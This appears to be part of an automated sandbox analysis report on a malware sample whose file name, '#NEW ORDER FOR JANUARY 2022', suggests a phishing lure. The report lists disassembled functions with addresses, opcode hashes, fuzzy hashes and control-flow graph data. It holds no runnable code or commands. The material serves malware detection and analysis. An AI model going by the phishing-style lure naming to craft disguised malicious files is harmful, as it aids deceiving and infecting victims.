                                • Opcode ID: 4ee33cb85423b1d0ae48880c77029deaf3ccf432c5ec86efb9ba0a4f92150613
                                • Instruction ID: 99384d031b1084f5e93a37f316e6a05b2a0f194dec986a02cb91aac85179bd26
                                • Opcode Fuzzy Hash: 4ee33cb85423b1d0ae48880c77029deaf3ccf432c5ec86efb9ba0a4f92150613
                                • Instruction Fuzzy Hash: C9615B34A00A068FCB15CF59D4C08AAFBFAFF88310B55C569D91997656DB30FC55CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05814800, Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1076 5814800-5814839 1079 5814848-5814876 1076->1079 1080 581483b-5814845 1076->1080 1085 58149cb-58149e9 1079->1085 1086 581487c-5814895 1079->1086 1080->1079 1091 5814a54-5814a5e 1085->1091 1092 58149eb-5814a0d 1085->1092 1093 581489b-58148b1 1086->1093 1094 58149ac-58149c5 1086->1094 1102 5814a5f-5814ab2 1092->1102 1103 5814a0f-5814a2b 1092->1103 1093->1094 1101 58148b7-58148f5 1093->1101 1094->1085 1094->1086 1122 58148fa-5814905 1101->1122 1117 5814ad2-5814b10 1102->1117 1118 5814ab4-5814ad0 1102->1118 1107 5814a4f-5814a52 1103->1107 1107->1091 1108 5814a39-5814a3c 1107->1108 1108->1102 1111 5814a3e-5814a4e 1108->1111 1111->1107 1118->1117 1125 5814907-581492d 1122->1125 1126 581492f-5814953 1122->1126 1125->1126 1135 5814985-581499e 1126->1135 1136 5814955-581496c 1126->1136 1138 58149a0 1135->1138 1139 58149a9 1135->1139 1142 5814978-5814983 1136->1142 1143 581496e-5814971 1136->1143 1138->1139 1139->1094 1142->1135 1142->1136 1143->1142
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: k@'
                                • API String ID: 0-984539097
                                • Opcode ID: b84e4bcb9b8469bd409303525089d003d8528a2f77f2afacd78c3126efe4be7a
                                • Instruction ID: b3b5a87cd9c3423a327b0f1862c6ed72de25689924ac94ab6270229735fdd1a4
                                • Opcode Fuzzy Hash: b84e4bcb9b8469bd409303525089d003d8528a2f77f2afacd78c3126efe4be7a
                                • Instruction Fuzzy Hash: C151E634B102058FCB18DF69D498AAEB7F6BF89704B5584A9E906EB371DB31EC01CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05819576, Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: p\fk
                                • API String ID: 0-3323649189
                                • Opcode ID: bfe6ec7285da6d6cfeefca6c8f4d743bc38bb83b94ab4b6ef4a4975a28a24d36
                                • Instruction ID: 767dcffc26726979a041f4d4706685a4dae1a3e220d7414d159a787bb0cea6f8
                                • Opcode Fuzzy Hash: bfe6ec7285da6d6cfeefca6c8f4d743bc38bb83b94ab4b6ef4a4975a28a24d36
                                • Instruction Fuzzy Hash: 9E419075B002188FCB14EF78D490AAE77B7BFC8244B644429D802AB354DF35DC02CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01761518, Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: P@2l
                                • API String ID: 0-866591868
                                • Opcode ID: 337a6ae9c60488719384344deed7ac0260dc6c7f220654d91e23f0e73bc92788
                                • Instruction ID: 374933c97213100d0a3d5b3eddffdaceb4c7942f816e2058d9ef8f4876b71c1a
                                • Opcode Fuzzy Hash: 337a6ae9c60488719384344deed7ac0260dc6c7f220654d91e23f0e73bc92788
                                • Instruction Fuzzy Hash: BE31A075B002149FDB15DF74D4586AEB7F6AB89740F2845A9D802DB391DF34CC02CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01761528, Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID: P@2l
                                • API String ID: 0-866591868
                                • Opcode ID: b6e26915f5a45d4c786cf0fb6b58683ecca54afdb62f369a5005a14c59fc72c8
                                • Instruction ID: 2ec0019f94c923245717be045bd3184d2ece84a7cfcbb55dbdafd87b7894f2bb
                                • Opcode Fuzzy Hash: b6e26915f5a45d4c786cf0fb6b58683ecca54afdb62f369a5005a14c59fc72c8
                                • Instruction Fuzzy Hash: 67219335B002048FDB15EB74D0286AEF7F6AB88640F244569D802DB385DF74CC02CBA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0176F168, Relevance: .4, Instructions: 442COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8f61e4422530cf92fbfa096242db825524ac9ae05e8f64e777929dc46373090f
                                • Instruction ID: abf4c6b36b8f558a19ec1c0a99f5c74d7d17f31af3110d33afe0ace8848afdc1
                                • Opcode Fuzzy Hash: 8f61e4422530cf92fbfa096242db825524ac9ae05e8f64e777929dc46373090f
                                • Instruction Fuzzy Hash: 26E11930B086018FDB269B7DB47462EBBEADF8615571640FACA16CB7A2DF35CC018752
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01760FD0, Relevance: .4, Instructions: 411COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: acf55989eb04ca8305079ad167b19765a4213343be2b095e2c0e906b59fa5c29
                                • Instruction ID: 93478d764090fa7ea2e6ed97f6d22aa368f219f6f1e625f0884783c42eeea9e7
                                • Opcode Fuzzy Hash: acf55989eb04ca8305079ad167b19765a4213343be2b095e2c0e906b59fa5c29
                                • Instruction Fuzzy Hash: 7EF17E757002049FCB05DF68D848E69BBF6FF88314B1580A9E60A9B372DB36DC15DB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581F0A0, Relevance: .4, Instructions: 405COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9e5fb888d3e0d3fa9deb53cefcb1218599987ed29a12ee1a2bd57a5875fc9bf
                                • Instruction ID: 08dede579b852f16107c3bdae3b6229648c1261a205d146bb07890d05b9c2cff
                                • Opcode Fuzzy Hash: c9e5fb888d3e0d3fa9deb53cefcb1218599987ed29a12ee1a2bd57a5875fc9bf
                                • Instruction Fuzzy Hash: F1E117347105118FC714DF3DC598A2AB7EAAF8861871580A9EE0ACB775EF70EC02CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581C498, Relevance: .4, Instructions: 399COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 59b30cf09f6b27c7a61086df4f8cd625d1e00889a77dee7b311459aa8d9aea94
                                • Instruction ID: d819586cab597c560f07c2c985bf6f90f74cec91d40e0ddefe96087ab1894cb7
                                • Opcode Fuzzy Hash: 59b30cf09f6b27c7a61086df4f8cd625d1e00889a77dee7b311459aa8d9aea94
                                • Instruction Fuzzy Hash: 21F15835704604CFDB54CF2AC489A6ABBE6FF85214F1984A9E946CB771CB74EC00CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 01760FA8, Relevance: .4, Instructions: 398COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c79f53325468f2d5ad8d3a2ed110fb5bff10cf9073168845bfb53bb28c79ad3d
                                • Instruction ID: 8f504cfb09f68135f78c0309a027a7f1517587f2de8189897d57fd97c81960b9
                                • Opcode Fuzzy Hash: c79f53325468f2d5ad8d3a2ed110fb5bff10cf9073168845bfb53bb28c79ad3d
                                • Instruction Fuzzy Hash: 11E15E75B002049FCB05DF68D858E69BBB7FF88314B1580A8E60A9B372DB36DC15DB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05819CE8, Relevance: .4, Instructions: 375COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 732224d6622ae403f9309d23d2d489140a7ba8d51573adf69e1551c8ef74737f
                                • Instruction ID: 15d40583abeaa847f7df9f014fe046dfb8a6e79a4aabb1bc615e1d765c2a03e2
                                • Opcode Fuzzy Hash: 732224d6622ae403f9309d23d2d489140a7ba8d51573adf69e1551c8ef74737f
                                • Instruction Fuzzy Hash: 93D1FF31B05225DFCB268B68C45063ABBBABF89B10F15846AED46DB355CB30DC41CBE5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581B798, Relevance: .4, Instructions: 364COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 67d921f0f71296fc316aaec778c497d629b5083bf8a8640b6d55b30290525e55
                                • Instruction ID: 84226d71bc5d665672c959028358ea7342e9646210ed8e2d7369a83eebc7dca2
                                • Opcode Fuzzy Hash: 67d921f0f71296fc316aaec778c497d629b5083bf8a8640b6d55b30290525e55
                                • Instruction Fuzzy Hash: EAD1AC34B05225CFDB258B24D64472ABBAABF85B06F198568ED06DB385DF31DC42CBC4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05818700, Relevance: .3, Instructions: 302COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 89f4f4231376364177ad41a466b21e430dec2e140a3e80782de2bb6d5cf14e52
                                • Instruction ID: 3e53b691969a23a98d224d498e86ca8d8a22fcde3332b67790005a596c48bf0a
                                • Opcode Fuzzy Hash: 89f4f4231376364177ad41a466b21e430dec2e140a3e80782de2bb6d5cf14e52
                                • Instruction Fuzzy Hash: 0DC1F635A04208AFDB15CF98D485AAEBBB6FF48224F248459EC05EB351DB31ED81CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581BFF8, Relevance: .2, Instructions: 249COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9bd9f842709932d4fa317a5520d71da30345583ff01bdabc0e3b5781a4c6e019
                                • Instruction ID: 85c4919f5143eafb34603d4ff68291211c63742db655d21090f8b001d6ef93ac
                                • Opcode Fuzzy Hash: 9bd9f842709932d4fa317a5520d71da30345583ff01bdabc0e3b5781a4c6e019
                                • Instruction Fuzzy Hash: 0DA14A34B042098FCB14DFA9D5949AEB7B6BF85704B218569DD0AEB364DF70EC06CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581F8A0, Relevance: .2, Instructions: 235COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 02dde914fdb8f53a2725d8580060b15348daa62f98908ac87f5745790c36a361
                                • Instruction ID: 433d3d22ef760c092bb720cd1c45da86273f2f6e9ae44550ff0275558e320a17
                                • Opcode Fuzzy Hash: 02dde914fdb8f53a2725d8580060b15348daa62f98908ac87f5745790c36a361
                                • Instruction Fuzzy Hash: 7081A035B002048FCB14DB79D55496AB7FAFF88214B1584A9DE1ADB361DF34EC01CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0176AA70, Relevance: .2, Instructions: 230COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cba4699b1dc75ced48062690ab0e7b1b3f3e8fad8dbdb7754dd8d8eb55d14069
                                • Instruction ID: 2eb95b1314debf07198819fb3ed1630a7e480b21d7fd3c2471edfcea76097afb
                                • Opcode Fuzzy Hash: cba4699b1dc75ced48062690ab0e7b1b3f3e8fad8dbdb7754dd8d8eb55d14069
                                • Instruction Fuzzy Hash: 3AA128746007069FC744EF28D48485ABBB2FF9962475589A8E54ACB372DF30FC46CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05814BF0, Relevance: .2, Instructions: 222COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e40e89d549fec8620769851b8ccfc353a0c77844ef12641e3fb6144a7645c36f
                                • Instruction ID: d452e8d213a2785748921378e6cbe378c69a3a9e2678c264228628a3c439b258
                                • Opcode Fuzzy Hash: e40e89d549fec8620769851b8ccfc353a0c77844ef12641e3fb6144a7645c36f
                                • Instruction Fuzzy Hash: 327160347142148FCB149B39D858E2ABBEABF89755B1580AEE906CB3B2DF71DC41CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0176FD70, Relevance: .2, Instructions: 221COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 93e5427466e493f96ac9071119018944f928efc62f09abc489f43dc709ddfcf0
                                • Instruction ID: 53f75c901147d7b4c58f503487359565c021fc31b13cf1b042e11ff13ace10de
                                • Opcode Fuzzy Hash: 93e5427466e493f96ac9071119018944f928efc62f09abc489f43dc709ddfcf0
                                • Instruction Fuzzy Hash: 77617074B002059FDB08AF69E8586AEBBBAFFC8700F548029E906D7395DF35DC418B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 058156A0, Relevance: .2, Instructions: 210COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ac3927a41257ec3566156f2a714d6b0752328c35de82858ed641df5fd448fc90
                                • Instruction ID: 2518c8d306e296c8b6e7bdb9fe34b7134eb9226de3e476903c96064c1ffab30c
                                • Opcode Fuzzy Hash: ac3927a41257ec3566156f2a714d6b0752328c35de82858ed641df5fd448fc90
                                • Instruction Fuzzy Hash: 09814C75B002198FCB14DF68D4859AEBBFAFF88214B1584AAEC15DB361DB30EC41CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0176CA48, Relevance: .2, Instructions: 187COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b4f41c11f4172876a15fd555301730fbddf380efcf345674c5aaab7590824f1
                                • Instruction ID: 9f44490619402755b6a86db4bd36c80593dfcfcc155b9e6bcb39f338eec8fed6
                                • Opcode Fuzzy Hash: 8b4f41c11f4172876a15fd555301730fbddf380efcf345674c5aaab7590824f1
                                • Instruction Fuzzy Hash: 9161A171A046098FCB11DF58D4849AEFBB6FF84224B15C959D559DB212DB31FC06CBE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581BFE8, Relevance: .2, Instructions: 185COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1abd1776a1a7d5ca1740aa4f5921d3e24b377688301288fa0d35baa92e04723b
                                • Instruction ID: f3dc065332649c373f31c1ecb82c49172ca4e5e6d045080fafc9a1f921b265cf
                                • Opcode Fuzzy Hash: 1abd1776a1a7d5ca1740aa4f5921d3e24b377688301288fa0d35baa92e04723b
                                • Instruction Fuzzy Hash: F6718B34A046098FCB18DFA4D49499EBBF6FF85704B118569D90AEB364DF74EC06CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 058144DF, Relevance: .2, Instructions: 179COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9fb076b137a2ce80619102d34e8ad17b8ec066e3fe0e348c773418ca76d51308
                                • Instruction ID: c960eedb6faec75855253ecf4ba01f07c7927c6e0e31b588d202422eddb6cf80
                                • Opcode Fuzzy Hash: 9fb076b137a2ce80619102d34e8ad17b8ec066e3fe0e348c773418ca76d51308
                                • Instruction Fuzzy Hash: C5613734F142198FDB14DB69D894AAEB7FABF88744F158069DD06EB360DB70DC028B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581BC38, Relevance: .2, Instructions: 174COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c041b9b66b9e186518d86199929e6c0d693e537d741d48061399609201e88480
                                • Instruction ID: d18fb2725d1fb9b59663de18cea47645170085e4fffc7a327760e2173d057b07
                                • Opcode Fuzzy Hash: c041b9b66b9e186518d86199929e6c0d693e537d741d48061399609201e88480
                                • Instruction Fuzzy Hash: BE612939A00204CFCB28DF65D458AA9B7BAFF88355F118069ED06E7360DB34EC41CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05816598, Relevance: .2, Instructions: 152COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f84a4ed53755474764dd53310f97e0b5d02eb7874c0d85e89139e67fb836347
                                • Instruction ID: 49d8809253ef25e35a1462b4ed33dcc72b65d8056405529469f3995f4903a9ef
                                • Opcode Fuzzy Hash: 7f84a4ed53755474764dd53310f97e0b5d02eb7874c0d85e89139e67fb836347
                                • Instruction Fuzzy Hash: 7451C475B00205CFCB10DF69D48499EBBFAFF88224B1584AAD945D7721EB31EC41CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581FBB8, Relevance: .1, Instructions: 145COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b0e4c77dc334a71ae677cb5c3ac8a9bba7517b83cdd160527884d4085b15d45
                                • Instruction ID: f64e41e1ada5d808bc1517c22b5bedfcafd24a43bc0a2075270a5ca38a9e7e31
                                • Opcode Fuzzy Hash: 8b0e4c77dc334a71ae677cb5c3ac8a9bba7517b83cdd160527884d4085b15d45
                                • Instruction Fuzzy Hash: 9B512A75A002159FCB15CF68D488AADBBF6BF49310F1581A9EC05EB362DB30EC81DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581A3C9, Relevance: .1, Instructions: 127COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f727b1bbd3f7aae0dca2e85c9e9e5b13598f27592d882d0da04140d44a503840
                                • Instruction ID: 1bd04cfad7e4fa7d52cf733b23838129b7809f88a58dd1e352abc123b00aad9c
                                • Opcode Fuzzy Hash: f727b1bbd3f7aae0dca2e85c9e9e5b13598f27592d882d0da04140d44a503840
                                • Instruction Fuzzy Hash: A9414E34A012059BCB18DF68E495A9EB7BAFF88614F50842CED56E7350DF31ED05CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581D2C0, Relevance: .1, Instructions: 123COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 22820006fa8c9387b7684a0f81e8bef6a36f5b00acb4a1312d5c6ccbaf9447b5
                                • Instruction ID: 6d4ddd806545b0cef1a8342877fb027c9c2378a6ac654e2ad32425c6f5071020
                                • Opcode Fuzzy Hash: 22820006fa8c9387b7684a0f81e8bef6a36f5b00acb4a1312d5c6ccbaf9447b5
                                • Instruction Fuzzy Hash: A44113357016058FDB14DBA9D884A6FBBBAFFC4214B15846ADC09CB751EB30EC02C7A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0176E278, Relevance: .1, Instructions: 118COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.723622703.0000000001760000.00000040.00000001.sdmp, Offset: 01760000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1760000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0df03dfeb9dd6d849e3e8435a1e2e6ee93ea571c8ffb262a24c6f2441c2e54ff
                                • Instruction ID: 15378a68393786b6cb8382e7e29ea6b27da469fb238e4ac04708f45d2457ba3d
                                • Opcode Fuzzy Hash: 0df03dfeb9dd6d849e3e8435a1e2e6ee93ea571c8ffb262a24c6f2441c2e54ff
                                • Instruction Fuzzy Hash: 62418A343007018FD314EB34E499A2A77A3FBD4614B55CA2CE5478B790DF30E80ADBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05818917, Relevance: .1, Instructions: 117COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de2f84a2aa1057c6917113271941fd545f65b1297e824a0c1459cbace8bde55e
                                • Instruction ID: e2617782814a3589826d6d3ad256776242d373ba0bef3ffcd6f03e10a50f2b7a
                                • Opcode Fuzzy Hash: de2f84a2aa1057c6917113271941fd545f65b1297e824a0c1459cbace8bde55e
                                • Instruction Fuzzy Hash: 3C51D635A00209AFDB05CF98D485A9DBBB6FF48314F25C558E805AB361CB76ED82CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05815F60, Relevance: .1, Instructions: 116COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e0f4895ead4f2e120cf247a9311b2a40cbde88a28114430bc3083b33950b65c
                                • Instruction ID: d3605c65f41ba189c4a6e276a214634a7bb0373efcbc5139cd769101f3e11b32
                                • Opcode Fuzzy Hash: 8e0f4895ead4f2e120cf247a9311b2a40cbde88a28114430bc3083b33950b65c
                                • Instruction Fuzzy Hash: 3E413434A006069FCB14CF59C88096ABBF6FF89310B15C999E99ADB661E731FC01CF94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0581DC58, Relevance: .1, Instructions: 114COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_5810000_#NEW ORDER FOR JANUARY 2022.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8fdade657a826c0d6160be7bc7bb54ed88e2776d21be4a798fa026f66f4a8768
                                • Instruction ID: 0dfdd7ace17ddbbeca9e231c1dc325ecdd5db2e98438f05b5c09bcae7629c6d2
                                • Opcode Fuzzy Hash: 8fdade657a826c0d6160be7bc7bb54ed88e2776d21be4a798fa026f66f4a8768
                                • Instruction Fuzzy Hash: AA418CB57053049FC714DF68D8849AABBF9FF89314B1088A9E809CB341D730EC46CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 05813CC3, Relevance: .1, Instructions: 113COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.737109449.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
